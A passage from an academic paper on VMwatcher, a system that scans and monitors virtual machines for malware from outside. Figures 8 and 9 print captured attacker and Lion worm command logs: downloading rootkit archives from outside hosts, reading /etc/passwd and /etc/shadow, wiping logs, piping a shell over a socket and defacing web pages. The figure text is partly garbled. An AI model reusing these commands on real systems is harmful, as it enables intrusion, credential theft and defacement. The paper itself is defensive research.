	build-29996	FC1, 2, 3, 4, RHEL4	
Frisk F-PROT	Xen 3.0.2-2	Debian 3.1	Scientific
AntiVirus For	QEMU	Red Hat 7.2, 8.0, 9.0	Linux 4.4
Linux 4.6.6	0.8.2		
McAfee	UML	Red Hat 7.2, 8.0, 9.0	Red Hat
VirusScan 4.24.0	2.4.24		(RHEL4)
Sophos	QEMU	Red Hat 7.2, 8.0, 9.0	Red Hat
Anti-Virus 4.05.0	0.8.2		(RHEL4)
Tripwire 4.05.0	UML	Red Hat 7.2, 8.0, 9.0	Red Hat
(Open Source)	2.4.24		(RHEL4)
ClamAV 0.88.5	UML	Red Hat 7.2, 8.0, 9.0	Red Hat
(Open Source)	2.4.24		(RHEL4)

Table II. A List of Off-the-Shelf Antivirus Software Systems Deployed on VMwatcher

For comparison, we also run Microsoft Windows Defender (version 1.1.1592.0) in the host domain of the same compromised VM; the result is shown in Figure 7. Interestingly, the scanning result shows no malware infection. It seems that this specific version of antivirus software targets malware on Windows platforms thus missing the Linux malware.

## 4.3 Nonintrusive Malware/Attack Monitoring

To demonstrate the nonintrusive system call monitoring capability of VMwatcher, we deploy VMwatcher in an integrated, VM-based malware experimentation platform we developed earlier. The platform consists of a front end and a back end: The front end is a honeyfarm [Jiang and Xu 2004] that captures real-world malware and intrusion incidents from production networks, while the back end is a confined and high-fidelity "playground" [Jiang et al. 2005] where real-world malware can be unleashed and closely observed. Previously, we installed Sebek [Sebek 2006]—a widely used honeypot monitoring and logging tool—inside the front-end and back-end VMs. Unfortunately, Sebek can be detected, disabled, or bypassed by counter-monitoring techniques, such as

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(a) A screenshot of Symantec AntiVirus before its scanning.

(b) A screenshot of Symantec AntiVirus after scanning.

Fig. 6. External inspection of a honeypot using Symantec AntiVirus (version 10.1.0.396).

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Select drives an	nd folders to scan:	( Community		
How do you want Windows Defender to	A Floggy (A)	P2 Scali statistics		
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O Full system scan	7:)	Start time: 5:40 PM		
Scan selected drives and folders     Select		Objects scapped: 00:01:40 Objects scapped: 37702		
		Status		
Scan Now		Last scan:	Not available	
		Scan schedule:	Daily around 2:00 AM.	
		Definition version:	1.14.1734.6 created on 10/23/2006 at 4:22	PM.
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(a) A screenshot of Windows Defender before its (b) A screenshot of Windows Defender after scanning, scanning,

Fig. 7. External inspection of a honeypot using Microsoft Windows Defender (version 1.1.1592.0).

unsebek [Corey 2004] and NoSEBrEaK [Dornseif et al. 2004], which can be easily adopted by stealthy malware in the wild. In comparison, VMwatcher is less susceptible to counter monitoring as it runs outside without any in-the-box entity and thus is entirely passive. With VMwatcher, we can now remove Sebek from the VMs.

In the following, we describe two experiments to demonstrate the effectiveness of VMwatcher in monitoring and logging malware and attack behavior in a nonintrusive, tamper-resistant way.

*Experiment V—nonintrusive monitoring of attack behavior.* This attack incident, captured by the VMwatcher-enabled front-end honeyfarm, is against the vulnerable Samba server (version 2.2.1a-4). The honeypot VM was deployed at 21:00PM, October 7th, 2007, and compromised 2 hours later. VMwatcher captured and logged all system call events during and after the attacker's exploitation. The system call log contains sufficient details to understand the

Proce	ss ID (	Process Name)[System Call	<pre>#]: System Call Arguments</pre>	
PI	D 7676 (	sh) [sys_execve	11]: su	1. Gaining a root access directly
PI	D 7681 (	bash) [sys_execve	11]: cat /etc/issue	from the vulnerable
PI	D 7681 (	bash)[sys_execve	11]: wget xxxxxxx.xxxxxx.com/mihai.tgz	samba server
PI	D 7681 (	bash) [sys_execve	11]: tar xzvf mihai.tgz	
PI	D 7681 (	bash) [sys_execve	11]: rm -rf mihai.tgz	
PI	D 7681 (	bash) [sys_execve	11]: ./inst	
PI PI	D 7681 ( D 7681 (	bash) [sys_execve bash) [sys_execve	11]: rm -rf mihai 11]: ./wrapper	<ol> <li>Installing a set of backdoors, including a kernel rootkit</li> </ol>
PI PI PI PI	 ID 7681 ( ID 7681 ( ID 7681 (	bash)[sys_execve bash)[sys_execve bash)[sys_execve	<pre>11]: wget xxxxxx.xxxxx.com/malice.tgz 11]: tar xzvf malice.tgz 11]: rm -rf malice.tgz 111</pre>	called SucKit
PI	D /001 (	Dasii) [sys_execve	11]: ./1050	
PT	тр 7991 (	bash) [svs_execve	11]: ls	<ol> <li>Downloading and</li> </ol>
PI	D 7991 (	bash) [sys_execve	<pre>11]: wget http://xxxxxx.xxxxx.com// /samba-2.2.7-3.7.2.src.rpm</pre>	patching the vulnerable samba
PI	D 7991 (	bash) [sys_execve	11]: rpm -Uvh samba-2.2.7-3.7.2.src.rpm	server
	•			
PI PI PI PI PI PI PI PI	 D 7681 ( D 7991 ( D 7991 ( D 7991 (	bash) [sys_execve bash) [sys_execve bash) [sys_execve bash) [sys_execve bash) [sys_execve bash) [sys_execve bash) [sys_execve bash) [sys_execve bash) [sys_execve	<pre>11]: rm -rf mihai 11]: ./wrapper 11]: wget xxxxxx.xxxxx.com/malice.tgz 11]: tar xzvf malice.tgz 11]: rm -rf malice.tgz 11]: ./inst 11]: ls 11]: wget http://xxxxxx.xxxxx.com// /samba-2.2.7-3.7.2.src.rpm 11]: rpm -Uvh samba-2.2.7-3.7.2.src.rpm</pre>	<ol> <li>Installing a set of backdoors, includin a kernel rootkit called SucKit</li> <li>Ownloading and patching the vulnerable samba server</li> </ol>

Fig. 8. VMwatcher log excerpt showing attacker behavior after breaking into Samba server.

attacker's exploitation steps and post exploitation behavior. Figure 8 shows an excerpt of the log that records the commands executed by the attacher via the shell (bash) spawned from the exploitation.

From Figure 8, we observe that, after the successful exploitation, the attacker gained root privilege directly from the vulnerable Samba server and then downloaded and installed a set of prepackaged tools (*mihai.tgz* and *malice.tgz*). Later, forensic analysis shows that the tools include an infamous rootkit named SucKit [SucKit 2001] and a trojaned sshd daemon. Interestingly, the attacker used the trojaned sshd daemon (which spawned another shell with PID 7991) to upgrade and patch the vulnerable Samba server so that no other malware or attackers can infiltrate the server through the same vulnerability.

Experiment VI—nonintrusive monitoring of Lion worm behavior. This experiment with the Lion worm [Lion 2001] is performed in the backend malware playground enabled by VMwatcher. Figure 9 shows a log excerpt from a VMwatcher-enabled VM in the playground. The Lion worm exploits a vulnerable version of the DNS server and the VMwatcher log reveals details of the worm's behavior after compromising the DNS server.

More specifically, the Lion worm first redirects standard input, output, and error to an open file descriptor 6—a network socket (by making *sys\_dup2* system call) and creates a shell (*sys\_execve*). After the redirection, the compromised named process will get the attacker's instructions directly from the established network connection and put all output to the same network connection. The Lion worm then reads local password files /*etc/passwd* and */etc/shadow*, removes the system-wide log data (through the three *bin/rm* commands), replicates itself in the compromised VM (*/usr/bin/lynx*), and executes (*./lion*). From the VMwatcher log, we also observe that the Lion worm attempts to replace all *index.html* files in the compromised VM with its own copy, defacing the corresponding Web page.

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Process	SID (	Process Nam	me)[System Call	#]: System Call Arguments
PID	31122(	na syscall ret	amed) [sys_accept	102]5: socket 23
PTD	31122(	na	amed)[svs_recvfr(	2 102112: socket 22
PID	31122 (	na	amed) [sys_sendto	102]11: socket 22
			_	
PID	31122(	na	amed)[sys_dup2	63]: oldfd 6; newfd 2
PID	31122(	na	amed)[sys_dup2	63]: oldfd 6; newfd 1
PID	31122(	na	amed)[sys_dup2	63]: oldfd 6; newfd 0
PID	31122(	na	amed) [sys_execve	11]: /bin/sh
DTD	21122(		ch) [cyc_fork	21.
DID	21122(	avagall ret	sn) [sys_tork	2]. 21.21169
DTD	31168(	Syscari ieu	eb) [eve evecue	1], /bip/rm -rf /deg/ lib
DTD	21160(		ch) [sys_execve	11]. /bin/mkdir /dev/ lib
PTD	31170(		sh) [sys_execve	11]. /ugr/hin/killall -HID inetd
DTD	31171(		eh) [sys_execve	11]. / abi/in/ifconfig
PTD	31172(		sh) [svs_execve	111. /bin/cat /etc/passwd
PTD	31173 (		sh) [sys_execve	111: /bin/cat /etc/shadow
PTD	31174 (		sh) [sys_execve	11] · /bin/rm -fr lion
PTD	31175 (		sh) [svs_execve	111. /bin/rm -fr / bash history
PTD	31176 (		sh) [svs_execve	11]: /bin/rm -rf /var/log/maillog
PTD	31177(		sh) [svs_execve	111: /bin/chmod 755 lion
PID	31178(		sh) [sys execve	11]: /usr/bin/lynx -source http://192.168.2.2:27374
PID	31180(		sh) [sys_execve	11]: ./lion
PID	31181(		sh) [sys_execve	<pre>11]: /usr/bin/nohup find / -name index.html -exec /bin/cp index.html {} ;</pre>
PID	31181(		sh) [sys_execve	11]: /bin/nice -5 find / -name index.html -exec /bin/cp index.html {};
PID	31181(		sh) [sys_execve	11]: /sbin/find / -name index.html -exec /bin/cp index.html {};
PID	31181(		sh) [sys_execve	11]: /usr/sbin/find / -name index.html -exec /bin/cp index.html {};
PID	31181(		sh) [sys_execve	<pre>11]: /bin/find / -name index.html -exec /bin/cp index.html {} ;</pre>
PID	31181(		sh) [sys_execve	11]: /usr/bin/find / -name index.html -exec /bin/cp index.html {};
PID	31183(		sh) [sys_execve	11]: /bin/cp index.html /var/www/html/index.html
· · ·				

Fig. 9. VMwatcher log excerpt showing Lion worm behavior after compromising a vulnerable DNS server.

## 4.4 Performance

In this section, we present three sets of performance measurement results.

The first set of experiments is to compare the time to perform internal scanning and external scanning (enabled by VMwatcher) on a VM. In particular, we choose seven different antimalware software systems and each system performs an external scan and an internal scan on a particular VM: (i) Symantec AntiVirus, Microsoft Windows Defender and Microsoft Malicious Software Removal Tool each scan a Windows XP VM (256MB memory and 6GB disk) with the host OS being Windows XP Professional (2GB memory and 120GB disk); (ii) Kaspersky Anti-Virus inspects a Red Hat 8.0 VM (1GB memory and 4GB disk) with Scientific Linux 4.4 as the host OS (2GB memory and 180GB disk); (iii) F-PROT AntiVirus examines a Debian 3.1 Linux VM based on the Xen VMM while domain 0 is running Scientific Linux 4.4 (4GB memory and 330GB disk); (iv) McAfee VirusScan and Sophos Anti-Virus each look into a Red Hat 7.0 VM (128MB memory and 512MB disk) that is running inside a UML VMM. The host OS is RedHat Enterprise Linux 4 with 2GB memory and 135GB disk. The results and the total number of scanned files are shown in Figure 10. It is interesting to notice that the internal scanning session always takes longer time than its external counterpart, a result that sounds counterintuitive. However, considering the potential disk I/O slowdown introduced by virtualization as well as the availability of larger memory space in the host domain, the shorter external scanning time is actually reasonable. Another reason is that any software-based VM implementation (on the ×86 platform) needs to faithfully emulate "privileged" instructions (e.g., STI/CLI) and "sensitive" instructions (e.g., PUSHF/POPF). Such emulation may also have slowed down the internal scanning.

The second set of experiments measures the time to analyze a live raw VM memory image by VMwatcher. Note that in the current VMwatcher prototype,



Fig. 10. Comparison of internal scanning and external scanning time (external scanning is enabled by VMwatcher).



Fig. 11. Time to analyze live raw VM Memory image.

we assume that the Windows kernel-level symbols are not available due to its close-source nature, while the Linux symbols are available and can be used to speed up the memory semantic view reconstruction. Figure 11 shows the time needed to examine a raw Windows memory image when we vary the memory size from 128MB to 1GB. As expected, the analysis time grows with the size of available memory allocated to the VM. Our results also show that with the availability of Linux symbols, a raw memory analysis session can be finished within 0.5 second, regardless of the size of memory allocated to the VM.

The third set of experiments measures the overhead introduced by real-time interception and reconstruction of guest system call events. Our physical test machine is a Dell PowerEdge 2685 server with a 3.73GHz Intel Xeon processor and 4GB of RAM. The host OS is RedHat Fedora Core 5 with the default 2.6.15-1.2054\_FC5 Linux kernel. We evaluate the VMware-based implementation of VMwatcher using two benchmarks: One is the standard UnixBench [UnixBench 2007] microbenchmark while the another one is an application benchmark using ApacheBench [Apache 2007]. To measure the overhead, we run each benchmark program twice: Once with VMwatcher disabled and once with VMwatcher enabled for guest system call reconstruction. Each recorded result is the average of 10 runs.

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Benchmark	w/o VMwatcher	w/VMwatcher	Overhead
Dhrystone	654.0	654.4	0%
Whetstone	311.2	279.9	10.1%
Execl	334.0	297.3	11.0%
File copy 256B	387.8	350.9	9.3%
File copy 1kB	600.9	588.0	2.1%
File copy 4kB	1,055.0	1,000.14	5.2%
Pipe throughput	269.1	260.8	3.3%
Process creation	245.3	225.2	8.2%
Shell scripts (8)	558.3	537.8	3.7%
System call	198.8	189.5	4.7%

Table III. VMwatcher Overhead Measurement Using UnixBench (For the First Two Data Columns, Higher is Better)

The UnixBench benchmark measures the fine-grained performance impact of VMwatcher; the results are shown in Table III: The worst-case overhead is 11.0%, while the overheads in most other cases are below 10%. For the Apache experiment, we run the Apache Web server in the default Worker MPM mode and run the standard ApacheBench program in another machine connected to the Web server via a dedicated switch. The ApacheBench program stresses the Web server with requests for a Web page of 32KB and reports the Web server throughput. Our experiments show that VMwatcher incurs a 3.8% degradation of Web server throughput.

## 5. DISCUSSION

VMwatcher assumes a trusted VMM layer to isolate untrusted processes inside a monitored VM from affecting VMwatcher. This assumption is needed and there exist parallel efforts in building such trusted VMMs (Section 6). The VMM essentially establishes the root of trust of the entire system and secures the lowest-level system access. In the following, we examine possible attacks against VMwatcher.

*Guest view subversion*. Such an attack could be launched from inside the VM by distorting the guest function or state of the VM. The distorted view will then be observed by VMwatcher through VM introspection, resulting in erroneous guest view reconstruction. We further classify the guest view subversion attacks into two types—both will lead to distorted VMM-level observations:

The first type of guest view subversion attacks involve introducing a subverted guest kernel function, which is different from the one used by VMwatcher for semantic view reconstruction. For example, guest system call reconstruction requires the semantics and convention of system calls. Hence, it is possible that an attacker *remap* the system calls or system call convention in a nonstandard way to mislead or escape VMwatcher. As another example, instead of using the original Linux kernel scheduler with the default all-tasks list to dispatch processes, an advanced malware could implement its own scheduler, which maintains a shadow list of hidden processes without linking them to the alltasks list. Without knowledge about the subverted scheduler, VMwatcher is not able to accurately identify all running processes. Although it is challenging

to understand the details of a subverted guest function, we point out that the subversion behavior itself could be detected. In the previous example, the subversion of the original scheduler code will essentially modify the text segment of the guest kernel and a simple hash calculation (e.g., MD5) will immediately detect that. To counter this type of attack, VMwatcher can be extended to validate the integrity of guest functions and critical kernel objects (e.g., *sys\_call\_table* and IDT). Some existing systems such as Livewire [Garfinkel and Rosenblum 2003], Copilot [Petroni et al. 2004], SecVisor [Seshadri et al. 2007], and NICKLE [Riley et al. 2008] can be leveraged for that purpose.

The second type of guest view subversion attacks involve contaminating the guest internal states presented to VMwatcher for semantic view reconstruction. For example, an attacker may choose to manipulate certain guest kernel data structures (e.g., the global process list) to mislead the guest view casting function. The current VMwatcher prototype does require that the guest kernel data structures used by VMwatcher be trusted. Fortunately, there exist solutions that can be leveraged to either ensure the semantic integrity of kernel data structures [Petroni et al. 2006] or prevent the injection of malicious kernel code that manipulates kernel data structures [Riley et al. 2008].

*Guest caching exploitation.* This attack may occur if a modified file is not reflected in time in the disk that is being examined by VMwatcher. One potential result from this attack is that a malware may avoid any file scanning-based detection, as it can deliberately hide itself inside the cache without actually committing to the disk. There are two possible countermeasures: One is to make sure that those related guest kernel threads, such as *bdflush* and *kupdate*, dutifully look for dirty pages and flush them to the disk in time. The second countermeasure is to directly examine the cached contents through VM introspection since the cached contents are still in the volatile memory. However, one challenge here is to seamlessly integrate the memory content with related disk files and present them to the external antimalware functions.

*VM fingerprinting*. Finally, we note that VM environments can potentially be fingerprinted and detected [Klein 2003; Rutkowska 2004] by attackers. In fact, a number of recent malware instances are able to check whether they are running inside a VM and if so, choose to exhibit different behavior [Agobot 2004]. As a counte measure, we can improve the fidelity of VM implementation (e.g., as proposed in Kortchinsky [2004] and Liston and Skoudis [2006]) to thwart some of the VM detection schemes. Still, there exist more fundamental attacks (e.g., VM detection based on timing and performance overhead characterization) that are difficult to mitigate. However, from another perspective, as virtualization continues to gain popularity, the concern over VM detection may become less significant as more malware becomes VMM agnostic with VMs becoming increasingly attractive targets to attackers.

## 6. RELATED WORK

*Enhancing security with virtualization*. The first area of related work is the use of virtualization technologies to enhance system security. More specifically,

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leveraging recent advances in virtualization, researchers have adopted VMs to detect intrusions [Garfinkel and Rosenblum 2003; Joshi et al. 2005; Kourai and Chiba 2005], analyze intrusions [Dunlap et al. 2002; Koju et al. 2005], diagnose system problems [King et al. 2005; Whitaker et al. 2004], isolate services [Bryant et al. 2003; Meushaw and Simard 2000], and implement honeypots/honeyfarms [Honeynet 2008; Anagnostakis et al. 2005; Jiang and Xu 2004]. These applications leverage the desirable properties of VMs (e.g., isolation and dynamic configurability) to improve security and accountability of systems without having to trust the guest OS and application programs.

Our work complements or enhances these efforts by elevating the usability of the VM introspection methodology [Garfinkel and Rosenblum 2003], which is pioneered by the Livewire system [Garfinkel and Rosenblum 2003]. VM introspection in Livewire is capable of examining low-level VM states (e.g., disk blocks and memory pages) from outside the VM. However, for the reconstruction of high-level semantic views (e.g., files, processes, and kernel modules), it still needs a new technique, similar to the guest view casting technique in our system, to effectively bridge the semantic gap. While VMwatcher aims at supporting legacy antimalware software, Livewire mainly supports a specialized IDS built from scratch to detect a more targeted set of intrusions. Furthermore, we propose and demonstrate the opportunity of view comparison for selfhiding malware detection, which is not addressed in Garfinkel and Rosenblum [2003].

IntroVirt [Joshi et al. 2005] is another closely related work that applies VM introspection to execute vulnerability-specific predicates in a VM for intrusion reproduction. There exist two major differences between IntroVirt and VMwatcher. First, IntroVirt develops a specialized predicate engine that does not aim at accommodating legacy antimalware systems—a goal achieved by VMwatcher. Second, IntroVirt needs to overwrite a portion of the vulnerable program code with its own predicates or invoke existing code in either guest applications or the guest kernel. Such an approach is considered intrusive and will introduce undesirable perturbation in the VM. Consequently, it needs to resort to taking a checkpoint of the whole VM before making any changes to the VM state and rolling back to the saved checkpoint if perturbance is detected [Joshi et al. 2005]. In contrast, VMwatcher takes a nonintrusive approach and aims at externally reconstructing VM semantic views.

Implementing malware with virtualization. Leveraging virtualization technologies, researchers have also demonstrated the potential of implementing virtualization-based malware [King et al. 2006; Rutkowska 2006; Zovi 2006]. King et al. [2006] proposes the notion of VM-based rootkit (VMBR) which can be dynamically inserted underneath an existing OS. Rutkowska et al. [2006] further implements a hardware virtualization-based rootkit prototype called "Blue Pill," claiming the creation of 100% undetectable malware. Another hardware virtualization-based rootkit—the Vitriol [Zovi 2006] rootkit—independently confirms this significant threat. We point out that these emerging threats can be mitigated or even defeated by recent research efforts in secure booting [Arbaugh

et al. 1997] and secure VMMs, such as sHype [Sailer et al. 2005] and TRANGO [Trango 2008]. With secure booting, VMMs, will maintain the lowest-level access to the system thus preventing them from being subverted. Paralleling these efforts, VMwatcher assumes the nonsubvertability of VMMs in anticipation of future deployment of these anti subversion solutions.

Detecting integrity violations with secure monitors. VMwatcher is also related to projects that use secure monitors to detect system integrity violations [Garfinkel et al. 2003; Pennington et al. 2003, Petroni et al. 2004, 2006]. Copilot [Petroni et al. 2004] detects possible kernel integrity violations by running the monitoring software on a separate PCI card. The monitoring software periodically grabs a copy of the system memory and examines possible integrity violations. A specification-based integrity checker is later proposed [Petroni et al. 2006] to examine the integrity of dynamic kernel data. Note that these two systems only take snapshots of volatile memory states. The storage-based intrusion monitor [Pennington et al. 2003] leverages the isolation provided by a file server (e.g., an NFS server) and independently identifies possible symptoms of malware infections in disk states. Note that it only captures a system's persistent states. As a result, it is not able to detect elusive malware that may be hiding entirely in the memory (e.g., kernel-level rootkits). In contrast, VMwatcher examines both volatile and persistent states, as well as system call events for malware detection and monitoring.

Detecting malware with cross-view comparison. The notion of view comparison-based analysis is initially proposed by Wang et al. [2005] in their Strider GhostBuster system. Their system performs two scans—an internal scan and an external clean scan—and the two scanning results are then compared for malware detection. However, the external clean scan is done by rebooting the machine being examined with a clean OS (i.e., a WinPE CD). This will, unfortunately, destroy all nonpersistent states. On the other hand, VMwatcher performs *live* VM state and system call event procurement and semantic view reconstruction without losing any malware information. A number of recent rootkit detection systems such as RootkitRevealer [2007] and BlackLight [2007] also adopt the same methodology to detect stealthy malware. However, there is a lack of a trustworthy view for comparison as all the views (though from different perspectives) are generated from inside the system being monitored.

General intrusion detection techniques. Finally, we discuss the general intrusion detection systems (IDS), including the host-based IDS [Kim and Spafford 1994] and the network-based IDS [Snort 2008; Paxson 1999; Weaver et al. 2007]. We note that a network-based IDS is deployed outside of an endsystem, achieving high attack resistance at the cost of lower visibility on the internal system states. A traditional host-based IDS runs inside the endsystem and is able to directly inspect the states and events of the system, achieving better visibility. However, it sacrifices tamper resistance as it could be compromised during an attack. In contrast, VMwatcher achieves stronger tamper resistance while maintaining high visibility on the system's internal semantic states and system call events.

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## 7. CONCLUSION

We have presented VMwatcher, a VMM-based approach that enables out-ofthe-box malware detection and monitoring by addressing the semantic gap challenge. More specifically, VMwatcher achieves stronger tamper resistance by moving antimalware facilities out of the monitored VM while maintaining the native semantic view of the VM via external semantic view reconstruction. Our evaluation of the VMwatcher prototype demonstrates its practicality and effectiveness. In particular, our experiments with real-world stealthy rootkits and worms further demonstrate the power of the new malware detection and monitoring capabilities enabled by VMwatcher.

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